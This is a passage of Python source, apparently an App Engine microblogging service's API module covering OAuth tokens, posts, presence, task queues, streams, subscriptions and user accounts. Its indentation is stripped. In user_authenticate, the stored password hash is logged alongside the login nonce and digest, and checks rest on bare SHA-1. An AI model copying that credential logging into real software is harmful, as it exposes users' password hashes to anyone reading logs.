del actor_ref.extra['sms_double_opt_in']
actor_ref.put()
return actor_ref
@admin_required
def mobile_disassociate(api_user, nick, mobile):
actor_ref = actor_get(ROOT, nick)
key_name = Relation.key_from(relation='mobile',
owner=nick,
target=mobile)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
return
@owner_required
def mobile_get_actor(api_user, nick):
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'mobile')
rel_ref = query.get()
if rel_ref:
return rel_ref.target
return None
#######
#######
#######
def oauth_authorize_request_token(api_user, key, actor, perms="read"):
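  """Marks a request token as authorized by the given actor so that it can
  later be exchanged for an access token (see oauth_generate_access_token).
  """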
# TODO validate perms
# TODO privacy
token_ref = oauth_get_request_token(api_user, key)
token_ref.authorized = 1
token_ref.actor = actor
token_ref.perms = perms
token_ref.put()
@admin_required
def oauth_generate_access_token(api_user, consumer_key, request_token_key):
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
request_token_ref = oauth_get_request_token(ROOT, request_token_key)
if not request_token_ref.authorized:
raise Exception("unauthorized token")
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": consumer_ref.key_,
"actor": request_token_ref.actor,
"perms": request_token_ref.perms,
}
token_ref = OAuthAccessToken(**params)
token_ref.put()
return token_ref
@admin_required
def oauth_get_root_consumer_access_token(api_user, nick):
query = OAuthAccessToken.gql('WHERE actor = :1 AND consumer = :2',
nick, settings.ROOT_CONSUMER_KEY)
existing = query.get()
if existing:
return existing
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": settings.ROOT_CONSUMER_KEY,
"actor": nick,
"perms": "write",
}
token_ref = OAuthAccessToken(**params)
token_ref.put()
return token_ref
@owner_required
def oauth_generate_consumer(api_user, nick):
nick = clean.nick(nick)
# TODO(termie): not doing anything fancy yet, all keys are the same types
# TODO(termie): validation
# not too many keys
key_ = util.generate_uuid()
params = {'key_': key_,
'secret': util.generate_uuid(),
'actor': nick,
'status': 'active',
'type': 'desktop',
'commercial': 0,
}
token_ref = OAuthConsumer(**params)
token_ref.put()
return token_ref
@owner_required
def oauth_consumer_delete(api_user, nick, consumer_key):
"""Removes the oauth consumer key"""
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
consumer_ref.delete()
@owner_required
def oauth_consumer_update(api_user, nick, consumer_key, app_name,
consumer_type='desktop'):
consumer_type = clean.oauth_type(consumer_type)
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
consumer_ref.app_name = app_name
consumer_ref.type = consumer_type
consumer_ref.put()
return consumer_ref
@admin_required
def oauth_generate_request_token(api_user, consumer_key):
consumer_ref = oauth_get_consumer(api_user, consumer_key)
if not consumer_ref:
raise Exception("bad consumer")
params = {"key_": util.generate_uuid(),
"secret": util.generate_uuid(),
"consumer": consumer_ref.key_,
"authorized": 0,
}
token_ref = OAuthRequestToken(**params)
token_ref.put()
return token_ref
def oauth_revoke_access_token(api_user, key):
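  """Deletes an access token after verifying it belongs to the calling actor."""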
# ROOT for now, we're checking access a little down the line here
token_ref = oauth_get_access_token(ROOT, key)
if not token_ref:
raise exception.ApiException(0x00, "Token does not exist")
# Verify that this token belongs to the specified user.
if token_ref.actor != api_user.nick:
raise exception.ApiException(0x00, "Token does not belong to actor")
token_ref.delete()
@admin_required
def oauth_get_access_token(api_user, key):
key_name = OAuthAccessToken.key_from(key_=key)
return OAuthAccessToken.get_by_key_name(key_name)
@owner_required
def oauth_get_actor_consumers(api_user, nick):
nick = clean.nick(nick)
query = OAuthConsumer.gql('WHERE actor = :1 ORDER BY created_at', nick)
return list(query.run())
@owner_required
def oauth_get_actor_tokens(api_user, nick):
nick = clean.nick(nick)
query = OAuthAccessToken.gql(
'WHERE actor = :1 ORDER BY created_at', nick)
return list(query.run())
# TODO(termie): owner_required_by_consumer_key ?
def oauth_get_consumer(api_user, key):
key_name = OAuthConsumer.key_from(key_=key)
key_ref = OAuthConsumer.get_by_key_name(key_name)
if not key_ref:
return None
actor_ref = actor_get(ROOT, key_ref.actor)
if not actor_owns_actor(api_user, actor_ref):
raise exception.ApiException(exception.PRIVACY_ERROR,
'Only allowed to view your own API keys')
return key_ref
@admin_required
def oauth_get_request_token(api_user, key):
key_name = OAuthRequestToken.key_from(key_=key)
return OAuthRequestToken.get_by_key_name(key_name)
#######
#######
#######
@write_required
@owner_required
def post(api_user, _task_ref=None, **kw):
""" Post a new entry
This will attempt to infer if you are attempting to post to a
channel (prefixing the message with #channel)
PARAMS:
* message - the title of your entry
* location - free form location for this entry
* icon - the web icon for this icon
* nick - the actor posting this entry
* uuid - a unique identifier for this entry
RETURNS: entry_ref
"""
# grab the params we're interested in
message = kw.get('message', '').strip()
location = kw.get('location', '')
icon = clean.icon(kw.get('icon', 0))
generated = kw.get('generated', 0)
uuid = kw.get('uuid', util.generate_uuid())
nick = clean.nick(kw.get('nick', ''))
extra = {}
# Thumbnails are not yet shown on the site but are supported by the mobile
# client.
thumbnail_url = kw.get('thumbnail_url', None)
if thumbnail_url:
extra['thumbnail_url'] = clean.url(thumbnail_url)
channel_post_match = channel_post_re.search(message)
if channel_post_match:
match_dict = channel_post_match.groupdict()
channel = match_dict['channel']
message = match_dict['message']
new_kw = kw.copy()
new_kw['channel'] = channel
new_kw['message'] = message
new_kw['extra'] = extra
return channel_post(api_user, **new_kw)
if len(message) > MAX_POST_LENGTH:
message = message[:MAX_POST_LENGTH]
try:
validate.length(message, 1, MAX_POST_LENGTH)
validate.location(location)
validate.uuid(uuid)
except exception.ValidationError, e:
raise exception.ApiException(0x00, e.user_message)
if generated:
# TODO(termie): update the presence, yo
# update presence only
return
if settings.QUEUE_ENABLED:
task_ref = _task_ref
if not task_ref:
kw['uuid'] = uuid
task_ref = task_get_or_create(api_user,
nick,
'post',
uuid,
kw=kw)
# we've decided this is a presence update
stream_ref = stream_get_presence(api_user, nick)
actor_ref = actor_get(api_user, nick)
extra['title'] = message
extra['location'] = location
extra['icon'] = icon
values = {
'stream': stream_ref.key().name(),
'uuid': uuid,
'owner': stream_ref.owner,
'actor': actor_ref.nick,
'extra': extra
}
if settings.QUEUE_ENABLED:
try:
entry_ref = _process_new_entry_with_progress(
task_ref, actor_ref, stream_ref, values)
except exception.ApiException:
# Something is wrong, bail out and delete the task
task_ref.delete()
raise
else:
# XXX start transaction
#presence = _set_presence(**values)
entry_ref = _add_entry(stream_ref, new_values=values)
subscribers = _subscribers_for_entry(stream_ref, entry_ref)
inboxes = _add_inboxes_for_entry(subscribers, stream_ref, entry_ref)
_notify_subscribers_for_entry(subscribers,
actor_ref,
stream_ref,
entry_ref)
# XXX end transaction
return entry_ref
#######
#######
#######
@public_owner_or_contact
def presence_get(api_user, nick, at_time=None):
  """returns the presence for the given actor if the current user can view it"""
nick = clean.nick(nick)
if not at_time:
# Get current presence
key_name = 'presence/%s/current' % nick
presence = Presence.get_by_key_name(key_name)
if not presence:
# We did not always create presence from posts
presence_stream = stream_get_presence(api_user, nick)
latest_post = StreamEntry.gql(
'WHERE stream = :1 ORDER BY created_at DESC',
presence_stream.key().name()).get()
if latest_post:
presence = Presence(actor=nick,
uuid=latest_post.uuid,
updated_at=latest_post.created_at,
extra={'presenceline': {
'description': latest_post.extra['title'],
'since': latest_post.created_at}})
else:
presence = Presence.gql(
u"WHERE actor = :1 AND updated_at <= :2 ORDER BY updated_at DESC",
nick, at_time).get()
return ResultWrapper(presence, presence=presence)
def presence_get_actors(api_user, nicks):
"""returns the presence for the nicks given"""
o = {}
nicks = list(set(nicks))
if not nicks:
return o
for nick in nicks:
try:
presence = presence_get(api_user, nick)
except exception.ApiException:
presence = None
o[nick] = presence
return ResultWrapper(o, actors=o)
@owner_required
def presence_get_contacts(api_user, nick, since_time=None, limit=200):
"""returns the presence for the given actor's contacts"""
nick = clean.nick(nick)
limit = clean.limit(limit, 200)
if since_time:
since_time = clean.datetime(since_time)
o = []
# This isn't really general-purpose as it will limit us to as many contacts
# as can be fetched in one go.
# TODO(mikie): make this api paged.
# The reason we still want it is that the mobile client wants as much
# presence as possible but can't handle more than 200 contacts anyway.
contacts = actor_get_contacts(api_user, nick, limit=limit)
contacts.append(nick)
presences = presence_get_actors(api_user, contacts)
for nick, presence in presences.items():
if presence:
if not since_time or presence.updated_at > since_time:
actor_ref = actor_get(api_user, nick)
presence.extra['given_name'] = actor_ref.extra.get('given_name', '')
presence.extra['family_name'] = actor_ref.extra.get('family_name', '')
o.append(presence)
return ResultWrapper(o, contacts=o)
@throttled(minute=30, hour=1200, day=4000, month=20000)
@write_required
@owner_required
def presence_set(api_user, nick, **kw):
"""Presence has three timestamp-like fields:
updated_at is the moment we got the data and can be used to pull 'changed
since' presence based on a timestamp the caller has previously received.
  uuid is the identifier for this set of data. It can be used to distinguish
  data you've already seen from new data even when the difference in
  updated_at is smaller than the propagation delay.
senders_timestamp (in extra) is the time the data was created in the
originating system. It should be used for deciding or displaying freshness.
"""
nick = clean.nick(nick)
updated_at = utcnow()
uuid = kw.pop('uuid', util.generate_uuid())
previous_presence = presence_get(api_user, nick)
extra = {}
if previous_presence:
extra = previous_presence.extra
extra.update(kw)
validate.user_nick(nick)
validate.presence_extra(extra)
params = {'actor': nick,
'updated_at': updated_at,
'uuid': uuid,
'extra': extra,
'key_name': 'presence/%s/current' % nick}
presence = Presence(**params)
presence.put()
# TODO(tyler): Clean this so an API call doesn't fill the DB.
params['key_name'] = 'presence/%s/history/%s' % (nick, updated_at)
presence_history = Presence(**params)
presence_history.put()
return ResultWrapper(presence, presence=presence)
#######
#######
#######
@owner_required
def task_create(api_user, nick, action, action_id, args=None, kw=None,
progress=None, expire=None):
if args is None:
args = []
if kw is None:
kw = {}
if expire:
expire = utcnow() + datetime.timedelta(seconds=expire)
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
task_ref = Task(actor=nick,
action=action,
action_id=action_id,
expire=expire,
args=args,
kw=kw,
progress=progress
)
task_ref.put()
return task_ref
@owner_required
def task_get(api_user, nick, action, action_id, expire=DEFAULT_TASK_EXPIRE):
""" attempts to acquire a lock on a queue item for (default) 10 seconds """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
def _attempt_lock(key, expire):
qi = db.get(key)
now = utcnow()
if qi.expire and qi.expire > now:
raise exception.ApiLocked("Lock could not be acquired: %s" % key_name)
qi.expire = now + datetime.timedelta(seconds=expire)
qi.put()
# TODO(termie): this could probably be a Key.from_path action
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
try:
db.run_in_transaction(_attempt_lock, q.key(), expire)
return Task.get_by_key_name(key_name)
except db.TransactionFailedError:
exception.log_exception()
raise exception.ApiLocked("Lock could not be acquired: %s" % key_name)
return q
@owner_required
def task_get_or_create(api_user, nick, action, action_id, args=None,
kw=None, progress=None, expire=DEFAULT_TASK_EXPIRE):
try:
task_ref = task_get(api_user, nick, action, action_id, expire)
except exception.ApiNotFound:
task_ref = task_create(api_user, nick, action, action_id, args, kw, progress, expire=expire)
return task_ref
#@throttled(minute=30, hour=1200, day=4000, month=20000)
@owner_required
def task_process_actor(api_user, nick):
""" pop a task off the queue and process it """
nick = clean.nick(nick)
# TODO(termie): we can't do where expire < now AND order by created_at,
# so this means we are a bit more likely to have locked
# entries to sort through
query = Task.gql('WHERE actor = :1 ORDER BY created_at', nick)
# grab a task that is unlocked
task_ref = None
task_more = False
for fake_task_ref in query:
# if we already have one and we're still going then there are more to go
if task_ref:
task_more = True
break
try:
task_ref = task_get(api_user,
nick,
fake_task_ref.action,
fake_task_ref.action_id)
break
except exception.ApiLocked:
continue
except exception.ApiNotFound:
continue
if not task_ref:
raise exception.ApiNoTasks('No tasks for actor: %s' % nick)
logging.info("Processing task: %s %s %s p=%s",
task_ref.actor,
task_ref.action,
task_ref.action_id,
task_ref.progress
)
method_ref = PublicApi.get_method(task_ref.action)
rv = method_ref(api_user, _task_ref = task_ref, *task_ref.args, **task_ref.kw)
# if we don't already know that there are more, do another check after
# processing the item
if not task_more:
query = Task.gql('WHERE expire < :1', utcnow())
t_ref = query.fetch(1)
if t_ref:
task_more = True
return task_more
@admin_required
def task_process_any(api_user):
""" pop a task off the queue and process it """
# TODO(termie): we can't do where expire < now AND order by created_at,
# so this means we are a bit more likely to have locked
# entries to sort through
query = Task.gql('ORDER BY created_at')
# grab a task that is unlocked
task_ref = None
task_more = False
for fake_task_ref in query:
# if we already have one and we're still going then there are more to go
if task_ref:
task_more = True
break
try:
task_ref = task_get(api_user,
fake_task_ref.actor,
fake_task_ref.action,
fake_task_ref.action_id)
except exception.ApiLocked:
continue
except exception.ApiNotFound:
continue
if not task_ref:
raise exception.ApiNoTasks('No tasks')
logging.info("Processing task: %s %s %s p=%s",
task_ref.actor,
task_ref.action,
task_ref.action_id,
task_ref.progress
)
actor_ref = actor_get(ROOT, task_ref.actor)
method_ref = PublicApi.get_method(task_ref.action)
rv = method_ref(actor_ref,
_task_ref = task_ref,
*task_ref.args,
**task_ref.kw)
# if we don't already know that there are more, do another check after
# processing the item
if not task_more:
query = Task.gql('WHERE expire < :1', utcnow())
t_ref = query.fetch(1)
if t_ref:
task_more = True
return task_more
@owner_required
def task_remove(api_user, nick, action, action_id):
""" attempts to acquire a lock on a queue item for (default) 10 seconds """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
q.delete()
return True
@owner_required
def task_update(api_user, nick, action, action_id, progress=None, unlock=True):
""" update the progress for a task and possibly unlock it """
key_name = Task.key_from(actor=nick, action=action, action_id=action_id)
q = Task.get_by_key_name(key_name)
if not q:
raise exception.ApiNotFound(
'Could not find task: %s %s %s' % (nick, action, action_id))
q.progress = progress
if unlock:
q.expire = None
q.put()
return q
#######
#######
#######
# TODO(termie): STUB
@admin_required
def sms_receive(api_user, **kw):
pass
@admin_required
def sms_send(api_user, on_behalf, mobile, message):
# TODO(termie): do filtering, throttling, and whatnot based on on_behalf
sms_connection = sms.SmsConnection()
sms_connection.send_message([mobile], message)
#######
#######
#######
@owner_required
def settings_change_notify(api_user, nick, **kw):
actor_ref = actor_get(api_user, nick)
# Convert to boolean
email_notifications = kw.get('email', False) and True
actor_ref.extra['email_notify'] = email_notifications
im_notifications = kw.get('im', False) and True
actor_ref.extra['im_notify'] = im_notifications
sms_notifications = kw.get('sms', False) and True
actor_ref.extra['sms_notify'] = sms_notifications
actor_ref.put()
return actor_ref
@owner_required
def settings_change_password(api_user, nick, new_password):
validate.password(new_password)
actor_ref = actor_get(api_user, nick)
actor_ref.password = util.hash_password(actor_ref.nick, new_password)
actor_ref.put()
return actor_ref
@throttled(minute=2, hour=5, day=10)
@owner_required
def settings_change_privacy(api_user, nick, privacy):
privacy = int(privacy)
# XXX start transaction
actor_ref = actor_get(api_user, nick)
actor_ref.privacy = privacy
actor_ref.put()
# update all the related streams and subscriptions
streams = stream_get_actor(api_user, nick)
for s in streams:
if s.type != 'comments':
s.read = privacy
s.put()
# XXX end transaction
@owner_required
def settings_hide_comments(api_user, hide_comments, nick):
actor_ref = actor_get(api_user, nick)
actor_ref.extra['comments_hide'] = hide_comments == '1'
actor_ref.put()
# TODO(tyler): It seems odd to return actor_ref from these functions...
return actor_ref
@owner_required
def settings_update_account(api_user, nick, **kw):
# note: the only thing we care about at this point is full_name
params = {'given_name': kw.get('given_name', kw.get('first_name', '')),
'family_name': kw.get('family_name', kw.get('last_name', ''))}
validate.name(params['given_name'], "Your First Name", 'given_name')
validate.name(params['family_name'], "Your Last Name", 'family_name')
actor_ref = actor_get(api_user, nick)
actor_ref.extra.update(params)
actor_ref.put()
return actor_ref
#TODO
@owner_required
def settings_update_email(api_user, nick, email):
pass
#######
#######
#######
@throttled(minute=3, hour=20, day=30, month=40)
@write_required
@owner_required
def stream_create(api_user, **kw):
# TODO make sure user is allowed to do this
# TODO make sure this stream doesn't already exist
# TODO(mikie): inherit privacy from actor?
# TODO(tyler): Safety-check kw (so it doesn't blindly pass to extra)
params = {"owner": kw.get('owner'),
'title': kw.get('title', ''),
'type': kw.get('type', 'presence'),
'read': kw.get('read', PRIVACY_PUBLIC),
'write': kw.get('write', PRIVACY_PRIVATE),
'extra': kw.get('extra', {}),
'slug': kw.get('slug', util.generate_uuid())
}
stream_ref = Stream(**params)
stream_ref.put()
return stream_ref
@write_required
@owner_required
def stream_create_comment(api_user, nick):
""" create a default comments stream for the supplied actor """
actor_ref = actor_get(api_user, nick)
comments_params = {"owner": actor_ref.nick,
"title": "comments",
"type": "comment",
"slug": "comments",
"read": PRIVACY_PRIVATE,
"write": PRIVACY_PRIVATE,
"extra": {},
"slug": "comments",
}
comments_stream_ref = stream_create(api_user, **comments_params)
return comments_stream_ref
@write_required
@owner_required
def stream_create_presence(api_user, nick, read_privacy=PRIVACY_PUBLIC,
write_privacy=PRIVACY_PRIVATE):
actor_ref = actor_get(api_user, nick)
presence_params = {"owner": actor_ref.nick,
"title": "presence",
"type": "presence",
"slug": "presence",
"read": read_privacy,
"write": write_privacy,
"extra": {},
"slug": "presence",
}
presence_stream_ref = stream_create(api_user, **presence_params)
return presence_stream_ref
@public_owner_or_contact_by_stream
def stream_get(api_user, stream):
stream_ref = Stream.get_by_key_name(stream)
not_found_message = 'Stream not found: %s' % stream
if not stream_ref:
raise exception.ApiNotFound(not_found_message)
if stream_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
try:
# ensure the stream owner exists
actor_get(api_user, stream_ref.owner)
except exception.ApiDeleted:
raise exception.ApiDeleted(not_found_message)
except exception.ApiNotFound:
raise exception.ApiNotFound(not_found_message)
return stream_ref
@public_owner_or_contact
def stream_get_actor(api_user, nick):
query = Stream.gql('WHERE owner = :1', nick)
return list(query.run())
@public_owner_or_contact
def stream_get_comment(api_user, nick):
""" stream/nick/comments """
nick = clean.nick(nick)
key_name = Stream.key_from(owner=nick, slug='comments')
comment_stream = Stream.get_by_key_name(key_name)
if not comment_stream:
raise exception.ApiException(0x00, 'Stream not found')
return comment_stream
@public_owner_or_contact
def stream_get_presence(api_user, nick):
""" Queries the Stream entities to find the Stream corresponding to
api_user's presence stream.
The returned value should be the "stream/<nick>/presence" stream.
"""
nick = clean.nick(nick)
key_name = Stream.key_from(owner=nick, slug='presence')
presence_stream = Stream.get_by_key_name(key_name)
if not presence_stream:
raise exception.ApiException(0x00, 'Stream not found')
return presence_stream
# depends on stream_get's privacy
def stream_get_streams(api_user, streams):
o = {}
if not streams:
return o
streams = list(set(streams))
for stream in streams:
stream_ref = stream_get_safe(api_user, stream)
if stream_ref:
o[stream] = stream_ref
return o
def stream_get_safe(api_user, stream):
"""stream_get that returns None on privacy exceptions"""
try:
stream_ref = stream_get(api_user, stream)
except exception.ApiException:
return None
return stream_ref
def stream_is_private(api_user, stream):
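  """Returns True if the stream's read privacy is below PRIVACY_PUBLIC."""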
stream_ref = stream_get(ROOT, stream)
if stream_ref.read < PRIVACY_PUBLIC:
return True
return False
#######
#######
#######
@owner_required_by_target
def subscription_exists(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return False
return True
@owner_required_by_target
def subscription_get(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
return sub_ref
@admin_required
def subscription_get_topic(api_user, topic, limit=100, offset=None):
""" returns the subscriptions for the given topic (usually a stream)
"""
# TODO(termie): this will mean when paging that people with lower nicknames
# tend to receive things first, I'd prefer to order by
# created_at but that will take a couple mods in other places
query = Subscription.Query().order('target').filter('topic =', topic)
if offset is not None:
query.filter('target >', offset)
return query.fetch(limit)
@owner_required_by_target
def subscription_is_active(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return False
# if the stream is contacts-only check the state
if stream_is_private(ROOT, topic) and sub_ref.state != "subscribed":
return False
return True
@delete_required
@owner_required_by_target
def subscription_remove(api_user, topic, target):
key_name = Subscription.key_from(topic=topic, target=target)
sub_ref = Subscription.get_by_key_name(key_name)
if not sub_ref:
return
sub_ref.delete()
return sub_ref
@throttled(minute=50, hour=200, day=1000, month=2000)
@write_required
@owner_required_by_target
def subscription_request(api_user, topic, target):
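  """Creates (or upgrades) a subscription from target to topic.
  The subscription starts out 'subscribed' if the target's actor can already
  view the topic's actor; otherwise it is left 'pending' until confirmed.
  """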
target_nick = util.get_user_from_topic(target)
topic_nick = util.get_user_from_topic(topic)
if topic_nick is None:
raise exception.ApiException(0, 'Subscription topic must include username')
target_ref = actor_get(api_user, target_nick)
topic_ref = actor_get(api_user, topic_nick)
# TODO(termie): We'd also like to support blocking subscription requests
# and should probably make a state similar to 'rejected',
# though, XEP-0060 sect 4.2. doesn't have a 'rejected' state
# so returning one might confuse pub-sub folk
if actor_can_view_actor(target_ref, topic_ref):
state = 'subscribed'
else:
state = 'pending'
# TODO(termie) send an error back and set 'unconfigured' state appropriately
# if the subscription already exists we probably don't have to do anything
existing_ref = subscription_get(api_user, topic, target)
if existing_ref:
# if they were in a pending state but are for some reason now
    # allowed to complete the subscription, upgrade it, but don't downgrade
    # if the reverse is true as the subscription may have been confirmed
# by the topic's actor
if existing_ref.state == 'pending' and state == 'subscribed':
existing_ref.state = state
existing_ref.put()
return existing_ref
sub_ref = Subscription(topic=topic,
subscriber=target_ref.nick,
target=target,
state=state,
)
sub_ref.put()
return sub_ref
#TODO
def subscription_set_notify(api_user, topic, nick, target, notify):
""" changes the notification settings for a given subscription """
pass
#######
#######
#######
@admin_required
def user_cleanup(api_user, nick):
""" attempts to fx any users that have been left in an unstable state
"""
actor_ref = actor_get(api_user, nick)
if not actor_ref.normalized_nick:
actor_ref.normalized_nick = actor_ref.nick.lower()
actor_ref.put()
try:
presence_stream_ref = stream_get_presence(api_user, actor_ref.nick)
except exception.ApiException:
stream_create_presence(api_user,
actor_ref.nick,
read_privacy=actor_ref.privacy)
try:
comment_stream_ref = stream_get_comment(api_user, actor_ref.nick)
except exception.ApiException:
stream_create_comment(api_user, actor_ref.nick)
@admin_required
def user_create(api_user, **kw):
nick = kw.get('nick')
nick = clean.nick(nick)
params = {
'nick': nick,
'normalized_nick': nick.lower(),
'privacy': kw.get('privacy', PRIVACY_PUBLIC),
'type': 'user',
'password': kw.get('password', ''),
'extra': {
'given_name': kw.get('given_name', kw.get('first_name', '')),
'family_name': kw.get('family_name', kw.get('last_name', '')),
'sms_double_opt_in': True,
},
}
# validate
validate.not_banned_name(params['nick'])
validate.privacy(params['privacy'])
validate.password(params['password'])
validate.name(params['extra']['given_name'], "Your First Name", 'given_name')
validate.name(params['extra']['family_name'], "Your Last Name", 'family_name')
params['password'] = util.hash_password(params['nick'], params['password'])
try:
existing_ref = actor_lookup_nick(ROOT, nick)
except exception.ApiDeleted:
existing_ref = True
except exception.ApiException:
existing_ref = False
if existing_ref:
raise exception.ValidationError(
'Screen name %s is already in use.' % util.display_nick(nick))
# Create the user
actor = Actor(**params)
actor.put()
# Create the streams
presence_stream = stream_create_presence(api_user,
actor.nick,
read_privacy=params['privacy'])
comments_stream = stream_create_comment(api_user, actor.nick)
# Add the contact
rel = actor_add_contact(actor, actor.nick, ROOT.nick)
return actor
@admin_required
def user_authenticate(api_user, nick, nonce, digest):
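  """Challenge-response login check: the digest must equal sha1(nonce +
  stored password hash), or sha1(nonce + sha1(stored password hash)) when
  settings.MANAGE_PY is set. On success returns the actor's root-consumer
  access token, otherwise a falsy PrimitiveResultWrapper.
  """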
actor_ref = actor_get(api_user, nick)
logging.info("nonce %s digest %s password %s"%(nonce, digest,
actor_ref.password))
if digest == util.sha1(nonce + actor_ref.password):
return oauth_get_root_consumer_access_token(api_user, nick)
elif (settings.MANAGE_PY and
digest == util.sha1(nonce + util.sha1(actor_ref.password))):
return oauth_get_root_consumer_access_token(api_user, nick)
else:
return PrimitiveResultWrapper(False)
#######
#######
#######
# Helper class
class PublicApi(object):
methods = {"post": post,
"actor_add_contact": actor_add_contact,
"actor_get": actor_get,
"actor_get_contacts_avatars_since":
actor_get_contacts_avatars_since,
"entry_add_comment": entry_add_comment,
"entry_get_actor_overview": entry_get_actor_overview,
"entry_get_actor_overview_since": entry_get_actor_overview_since,
}
# Private methods are externally accessible but whose design has not been
# finalized yet and may change in the future.
private_methods = {"entry_add_comment_with_entry_uuid":
entry_add_comment_with_entry_uuid,
"entry_get_comments_with_entry_uuid":
entry_get_comments_with_entry_uuid,
"keyvalue_put": keyvalue_put,
"keyvalue_get": keyvalue_get,
"keyvalue_prefix_list": keyvalue_prefix_list,
"presence_get": presence_get,
"presence_set": presence_set,
"presence_get_contacts": presence_get_contacts,
}
root_methods = {"user_authenticate": user_authenticate,
"task_process_actor": task_process_actor
}
@classmethod
def get_method(cls, name, api_user=None):
if api_user and api_user.nick == ROOT.nick and name in cls.root_methods:
return cls.root_methods[name]
if name in cls.methods:
return cls.methods[name]
if name in cls.private_methods:
return cls.private_methods[name]
return None
class ResultWrapper(object):
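  """Wraps a raw API result for convenient access.
  Attribute access is proxied to the wrapped object, while to_api() converts
  the keyword views supplied at construction into API-serializable dicts.
  """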
def __init__(self, raw, **kw):
self.__dict__['raw'] = raw
self.__dict__['kw'] = kw
def __getattr__(self, attr):
return getattr(self.raw, attr)
def __setattr__(self, attr, value):
return setattr(self.raw, attr, value)
def __nonzero__(self):
return bool(self.raw)
def __len__(self):
return len(self.raw)
def to_api(self):
o = {}
for k, v in self.kw.iteritems():
if v is None:
o[k] = {}
else:
o[k] = models._to_api(v)
return o
def __eq__(self, other):
# support comparing to other ResultWrappers
if isinstance(other, self.__class__):
return self.raw == other.raw
else:
return self.raw == other
def __cmp__(self, other):
# support comparing to other ResultWrappers
if isinstance(other, self.__class__):
return self.raw.__cmp__(other.raw)
else:
return self.raw.__cmp__(other)
class PrimitiveResultWrapper(object):
""" ResultWrapper to be used by boolean responses """
def __init__(self, primitive):
self.value = primitive
def to_api(self):
return self.value
# BACKEND
# new squeuel
def _process_new_entry_with_progress(task_ref, actor_ref, new_stream_ref,
new_values, entry_ref=None,
entry_stream_ref=None):
""" this is probably one of the more complex pieces of machinery in the
  entire codebase so we'll be very liberal with comments
task_ref - the task we are currently processing
actor_ref - the actor who created the new entry
new_stream_ref - the stream in which the new entry is to be created
  new_values - the values for the new entry
entry_ref - if this is a new comment, the entry the new comment is on
entry_stream_ref - if this is a new comment, the stream of the entry the
new comment is on
"""
#logging.info("Processing task: %s %s %s p=%s",
# task_ref.actor,
# task_ref.action,
# task_ref.action_id,
# task_ref.progress
# )
# stages: entry - make the entry
# iterate inboxes
# actor inboxes
# follower inboxes
# iterate notifications
# First we need to figure out which stage we are in based on progress
progress = task_ref.progress
# FIRST STAGE: make the entry and initial inbox
# we'll also try to make the first set of followers
if not progress:
throttle.throttle(
actor_ref, task_ref.action, minute=10, hour=100, day=500, month=5000)
# every step of the way we try to do things in a way that will
# degrade best upon failure of any part, if these first three
# additions don't go through then there isn't really any entry
# and the user isn't going to see much until the queue picks
# it up
new_entry_ref = _add_entry(new_stream_ref,
new_values,
entry_ref=entry_ref)
# We're going to need this list all over so that we can remove it from
# the other inbox results we get after we've made the first one
initial_inboxes = _who_cares_web_initial(actor_ref,
new_entry_ref,
entry_ref)
# these are the most important first inboxes, they get the entry to show
# up for the user that made them and anybody who directly views the
# author's history
initial_inboxes_ref = _add_inbox(new_stream_ref,
new_entry_ref,
initial_inboxes,
shard='owner')
# we've accomplished something useful, bump our progress
# if this times out the above actions should all handle themselves well
# we leave the task locked because we hope to still get some more done
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress='inboxes:',
unlock=False)
except exception.Error:
exception.log_exception()
# Next up will be the inboxes for the overviews of the first bunch
# of subscribers
follower_inboxes, more = _who_cares_web(new_entry_ref,
progress=progress,
skip=initial_inboxes)
last_inbox = _paged_add_inbox(follower_inboxes,
new_stream_ref,
new_entry_ref)
if not more:
# We don't have any more followers to add inboxes for but
# we don't really expect to be able to get the notifications
# out in this pass also so we're going to let the queue
# handle them
next_progress = 'notifications:'
else:
# Mark where we are and let the queue handle the rest
next_progress = 'inboxes:%s' % last_inbox
# Bump the task and chill out, unlock it for the next eager hands
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# SECOND STAGE: more inboxes!
elif progress.startswith('inboxes:'):
# we'll need to get a reference to the entry that has already been created
entry_keyname = StreamEntry.key_from(**new_values)
new_entry_ref = entry_get(ROOT, entry_keyname)
# We're going to need this list all over so that we can remove it from
# the other inbox results we get after we've made the first one
initial_inboxes = _who_cares_web_initial(actor_ref,
new_entry_ref,
entry_ref)
my_progress = progress[len('inboxes:'):]
# More followers! Over and over. Like a monkey with a miniature cymbal.
follower_inboxes, more = _who_cares_web(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
last_inbox = _paged_add_inbox(follower_inboxes,
new_stream_ref,
new_entry_ref)
    # if there are more followers to fan out to, record where we left off;
    # otherwise bump us up to the notifications stage
if more and last_inbox:
next_progress = 'inboxes:%s' % last_inbox
else:
next_progress = 'notifications:'
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# THIRD STAGE: notifications!
elif progress.startswith('notifications:'):
# We'll need to get a reference to the entry that has already been created
entry_keyname = StreamEntry.key_from(**new_values)
